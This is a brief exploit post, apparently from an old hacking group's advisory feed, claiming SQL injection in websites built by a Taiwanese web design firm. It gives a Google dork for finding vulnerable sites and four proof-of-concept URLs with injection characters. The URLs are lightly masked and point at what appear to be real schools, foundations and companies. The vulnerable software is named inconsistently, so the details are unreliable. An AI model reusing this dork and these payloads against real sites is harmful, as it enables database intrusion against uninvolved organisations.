[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Exploit Title : Design by 沃德網頁設計 - 客製化網頁設計公司
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage: http://www.world-d.tw/
Google Dork : intext:"Design by 沃德網頁設計 - 客製化網頁設計公司" inurl:".php?id="
Date : 2015
Tested On : linux Kali + Windows Se7en
[-][-][-][-][-][-][-][-][-][-] DESCRITION [-][-][-][-][-][-][-][-][-][-]
Seditio CMS SQL injection vulnerabilities has been found and confirmed within the software as an anonymous user.
The following URLs and parameters have been confirmed to suffer from SQL injection.
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
# Poc Of VulnerAbility:
# www.all-englishX.com.tw/schools_d.php?id=2;'/
# www.eurotranXexpo.com/about.php?id=3;'
# www.cancercXarefoundation.com.tw/news.php?pid=10;'
# www.metanXoia-comm.com/tw/about.php?id=3;'
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Discovered by : AC3S
Special Tnx : 4L1R3Z4 - W.S.S.H - H_SQLI.EMpiRe - Ac!D - Maziar - C4T - EviL ShaDoW
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]